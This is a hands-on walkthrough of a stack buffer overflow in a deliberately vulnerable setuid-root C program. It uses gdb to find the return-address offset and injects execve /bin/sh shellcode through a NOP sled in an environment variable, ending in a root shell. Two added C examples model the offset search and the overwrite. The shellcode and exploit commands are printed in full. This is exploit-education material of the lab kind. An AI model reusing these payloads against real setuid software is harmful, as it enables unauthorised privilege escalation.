break a time, with break the c0de…

play with ron.c


I found this source on the internet, but the exploitation trick that came with it is old-style, so it's useless. So I took it as a challenge.
gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
 /**
    * Name: StackVuln.c
    * Author: Ron Bowes
    * Date: March 24, 2004
    * To compile: gcc StackVuln.c -o StackVuln
    * Requires: n/a
    *
    * Purpose: This code is vulnerable to a stack overflow if more than
    * 20 characters are entered. The exploit for it was written by
    * Jon Erickson in Hacking: Art of exploitation, but I wrote
    * this vulnerable code independently.
    */
    #include <stdio.h>
    #include <string.h>
    int main(int argc, char *argv[])
    {
        char string[40];
        strcpy(string, argv[1]);
        printf("The message was: %s\n", string);
        printf("Program completed normally!\n\n");
        return 0;
    }


gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger: 
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' 			[Ok]
[*] Checking null on randomize_va_space 				[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x1d	29
edx            0xb7fc50d0	-1208201008
ebx            0xb7fc3ff4	-1208205324
esp            0xbffff4d0	0xbffff4d0
ebp            0x41414141	0x41414141
esi            0x8048480	134513792
edi            0x8048370	134513520
eip            0x41414141	0x41414141
eflags         0x10246	[ PF ZF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
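An added example (my code, not part of gunslinger_'s post or of Ron Bowes' StackVuln.c): the gdb runs above grow the input one byte at a time until EIP reads 0x41414141. The same offset can be read off a single crash by sending a cyclic pattern in which every 4-byte window is unique: the value gdb prints as EIP is looked up in the pattern, and its position is the return-address offset (44 for ron). This generalizes the page's A x N probing. Assumed: a 32-bit little-endian target and the frame layout seen above; the crash itself is simulated in `eip_after_overflow` so the example runs without the binary.

```c
/* Added example, not from the original post: find the return-address offset
 * from one crash using a cyclic pattern instead of "A" x N, N = 40, 41, ...
 * Assumed: 32-bit little-endian target (as the ron binary above), and that
 * the 4 bytes sitting at the return-address slot are what `ret` pops into EIP. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fill buf with the classic Aa0Aa1...Zz9 pattern (no NUL bytes, so strcpy
 * copies all of it). Every 4-byte window is unique within 20280 bytes. */
size_t pattern_create(char *buf, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                char tri[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = tri[i];
            }
    return n;
}

/* Given the crash EIP as gdb prints it (e.g. 0x41414141), return the byte
 * offset in the pattern whose little-endian 4-byte load produced that value,
 * or -1 if the value is not part of the pattern (EIP came from elsewhere). */
long pattern_offset(const char *buf, size_t len, uint32_t eip)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (eip >> (8 * i)) & 0xff;   /* little-endian byte order */
    for (size_t off = 0; off + 4 <= len; off++)
        if (memcmp(buf + off, needle, 4) == 0)
            return (long)off;
    return -1;
}

/* Stand-in for the crash: the 4 bytes the overflow leaves at ret_off are what
 * main's `ret` loads into EIP. Only here so the example is self-checking. */
uint32_t eip_after_overflow(const char *input, size_t ret_off)
{
    uint32_t eip;
    memcpy(&eip, input + ret_off, 4);   /* host assumed little-endian, like the target */
    return eip;
}

int main(void)
{
    char pat[400];
    size_t n = pattern_create(pat, sizeof pat);
    /* Assumed layout from the gdb session above: return address at offset 44. */
    uint32_t eip = eip_after_overflow(pat, 44);
    printf("crash EIP 0x%08x -> offset %ld\n", eip, pattern_offset(pat, n, eip));
    return 0;
}
```

In practice the pattern goes in as `./ron $(pattern)`, the crash EIP comes from `(gdb) i r eip`, and `pattern_offset` replaces the eight gdb runs above; a -1 result means EIP was not taken from the input at all (compare the 44- and 45-byte runs above, which crashed inside libc).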
(gdb) list
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
21	        return 0;
22	    }
23	
(gdb) list 1
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is

Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) i r esp
esp            0xbffff488	0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password: 
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"  > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py  bof1    bof2.c  bof.c    bufferbruteforce.py  displant.c  easy.c  get_env    man-pages    ron             shellcode.bin  smashme2    vanish.c
bf2.py  bof1.c  bof3    brute    core                 easy2       expl    get_env.c  objdasm.vim  ron.c           shellcode.c    smashme2.c
bof     bof2    bof3.c  brute.c  displant             easy2.c     expl.c  hts        passwd.php   shellcode3.bin  smashme        smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n"  $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
	(Missing operator before  "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
	(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof# 
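An added example, not code from the post: a small model of what `strcpy(string, argv[1])` leaves in the return-address slot for each of the `"\x90" x N . addr x 10` payloads tried above, plus a check of the NOP-sled aim behind `0xbffffe78 + 100`. It shows why N=1..3 leave the frame intact (41 to 43 bytes stop short of offset 44), why N=4..7 corrupt it (the terminating NUL, or a misaligned slice of an address, lands in the slot, matching the 0xb7004141 and 0x00414141 crashes seen in gdb), and why only N=8 puts a whole, aligned address there. Assumed: the frame layout from the gdb session (40-byte buffer, saved EBP at offset 40, return address at 44), a little-endian host, and ORIG_RET as a made-up stand-in for main's real return address into __libc_start_main.

```c
/* Added example, not from the original post: model the strcpy overflow in
 * ron's frame and check the NOP-sled aim. Assumptions are labelled below. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RET_OFF   44            /* offset of the saved return address (from gdb) */
#define FRAME_LEN 52            /* buffer + saved EBP + ret, plus 4 spare bytes for the NUL */
#define ORIG_RET  0xb7e7b7ffu   /* stand-in: the real value lies in __libc_start_main */
#define NOP       0x90

/* Build "\x90" x pad . addr x reps into out; returns bytes written, or 0 if it
 * does not fit or if addr contains a NUL byte (strcpy would stop copying there). */
size_t build_payload(unsigned char *out, size_t out_len, size_t pad, uint32_t addr, size_t reps)
{
    size_t need = pad + 4 * reps;
    if (need > out_len) return 0;
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0) return 0;
    memset(out, NOP, pad);
    for (size_t r = 0; r < reps; r++)
        memcpy(out + pad + 4 * r, &addr, 4);   /* little-endian store, as on the target */
    return need;
}

/* What strcpy(string, argv[1]) leaves in the return-address slot: the payload
 * bytes are copied verbatim and exactly one NUL terminator follows them. */
uint32_t ret_after_strcpy(const unsigned char *payload, size_t len)
{
    unsigned char frame[FRAME_LEN];
    uint32_t ret = ORIG_RET, r;
    memset(frame, 0xcc, sizeof frame);    /* arbitrary fill for buffer and saved EBP */
    memcpy(frame + RET_OFF, &ret, 4);
    if (len + 1 > sizeof frame) len = sizeof frame - 1;
    memcpy(frame, payload, len);
    frame[len] = '\0';                    /* the terminator strcpy always writes */
    memcpy(&r, frame + RET_OFF, 4);
    return r;
}

/* Does the jump target land inside a NOP sled that starts at sled_base? */
int lands_in_sled(uint32_t target, uint32_t sled_base, size_t sled_len)
{
    return target >= sled_base && target - sled_base < sled_len;
}

int main(void)
{
    unsigned char p[128];
    const uint32_t addr = 0xbffffedcu;    /* PAYLOAD address + 100, as in the session */
    for (size_t pad = 1; pad <= 8; pad++) {
        size_t n = build_payload(p, sizeof p, pad, addr, 10);
        uint32_t ret = ret_after_strcpy(p, n);
        printf("pad %zu: %2zu bytes, ret slot = 0x%08x %s\n", pad, n, ret,
               ret == addr ? "(hijacked)" : ret == ORIG_RET ? "(untouched)" : "(corrupted)");
    }
    printf("0x%08x inside sled at PAYLOAD+0..199: %d\n", addr, lands_in_sled(addr, 0xbffffe78u, 200));
    return 0;
}
```

Two practical points fall out of the model. First, the padding must be chosen so that an address copy starts exactly at offset 44 and the NUL falls after it: for a 4-byte-aligned frame that means N ≡ 0 (mod 4) with N + 40 ≥ 48, which is the N=8 that finally worked above. Second, `lands_in_sled` shows that aiming 100 bytes into a 200-byte sled tolerates the environment string being up to about 100 bytes away from where `./get_env` reported it, which is what lets an address measured in one process (get_env) be reused in another (ron) without an exact correction.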